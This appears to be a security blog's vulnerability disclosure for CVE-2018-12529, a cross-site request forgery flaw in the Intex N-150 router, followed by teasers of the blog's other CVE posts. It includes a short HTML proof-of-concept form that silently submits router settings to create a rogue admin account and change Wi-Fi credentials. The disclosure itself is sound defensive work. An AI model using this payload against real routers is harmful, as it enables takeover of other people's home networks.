Skip to main content

Cross Site Request Forgery- Intex Router N-150 | CVE-2018-12529

By- Navina Asrani

Hi Readers,

Recently while tinkering with my wifi router, I was curious to find if it has possible loopholes and vulnerabilities. Curious to explore its functionalities, I started probing with the options.

Title of the Vulnerability:  Cross Site Request Forgery

Vulnerability Class: Code Execution/ Privilege Escalation

Technical Details & Description: The firmware allows malicious request to be executed without verifying source of request. This leads to arbitrary execution with malicious request which will lead to the creation of a privileged user.

CVE ID allocated: -  CVE-2018-12529

Product & Service Introduction: Intex Router

Steps to Re-Produce –
1.       Visit the application
2.       Go to any router setting modification page and change the values, create a request and observe the lack of CSRF tokens.
3.       Craft an html page with all the details for the built-in admin user creation and host it on a server
4.       Upon the link being clicked by a logged in admin user, immediately, the action will get executed
Exploitation Technique: A attacker can create a rogue admin user to gain access to the application.
Severity Level: High
Security Risk:
The presence of such a risk can lead to router  compromise as well as privileged user access.
Exploit code:
  <script>history.pushState('', '', '/')</script>
    <form action="" method="POST">
      <input type="hidden" name="GO" value="index&#46;asp" />
      <input type="hidden" name="v12&#95;time" value="1529768448&#46;425" />
      <input type="hidden" name="WANT1" value="3" />
      <input type="hidden" name="isp" value="3" />
      <input type="hidden" name="PUN" value="testuser&#95;k" />
      <input type="hidden" name="PPW" value="123456" />
      <input type="hidden" name="SSID" value="testwifiap" />
      <input type="hidden" name="wirelesspassword" value="00000000" />
      <input type="submit" value="Submit request" />
Affected Product Version: Intex Router n150

Solution - Fix & Patch: The application code should be configured to implement anti csrf token to filter malicous HTTP Requests.



Popular posts from this blog

Web Services/ API Penetration Testing Part - 1

Hi Readers, today we will learn about another interesting part of Penetration Testing, this revolves around Security assessments of web services. To start with let’s take a look at what web services are made of: A web service is software composed of standardized XML messaging system. The benefit of web services are since all of its communication is in XML, they are not restricted to any  operating system or programming languages They are built on Web services are built on top of open standards such as TCP/IP, HTTP, Java, HTML, and XML. Anatomy of Web Services In simple language, any basic web services platform is a combination of XML and HTTP. They can be of: ·          SOAP (Simple Object Access Protocol) ·          UDDI (Universal Description, Discovery and Integration) ·          WSDL (Web Services Description Language) How does a Web Service Work Web services depends on •             XML to tag the data ( as markup and syntax) •    

Arbitrary file upload and RCE in Wonder CMS - CVE-2017-14521

By- Samrat Das Hi Readers Recently in one of my pentest research, I found a CMS " WonderCMS" hosted in github. Curious to explore its functionalities, I downloaded and set it up in my local system. After fiddling with the source code, I found that it did not have any kind of file upload security mechanism and allowed the user to upload any file type! After reporting it to them, I did not receive any security relevant response, hence decided to publish a blog on this. Title of the Vulnerability:   Arbitrary File Upload Vulnerability Class: Security Misconfiguration Technical Details & Description: The application source code is coded in a way which allows arbitrary file extensions to be uploaded. This leads to uploading of remote shells/ malicious Trojans which can lead to complete system compromise and server takeover. CVE ID allocated :  CVE-2017-14521 Product & Service Introduction: Wonder CMS 2.3.1 WonderCMS is an open source CMS (Content Ma

HTML Injection- October CMS - CVE-2018-7198

HTML Injection- October CMS By- Samrat Das Hi Readers, Recently while performing some open source security assessment, I came across an CMS Application, “October CMS” . Curious to explore its functionalities, I set up a local copy and started playing around to find security vulnerabilities’.   Title of the Vulnerability :   HTML Injection. Vulnerability Class : Code Execution/ Information Stealing Technical Details & Description : The application source code is coded in a way which allows malicious HTML commands to be executed in the inner pages which can lead to execution of arbitrary code. CVE ID allocated :  -   CVE-2018-7198 Product & Service Introduction : October CMS Steps to Re-Produce – 1.        Visit the application 2.        Visit the Add Posts Page. 3.          Goto edit function and add any html payload, it gets saved and executed further in web page. Exploitation Technique : A attacker can perform application defacing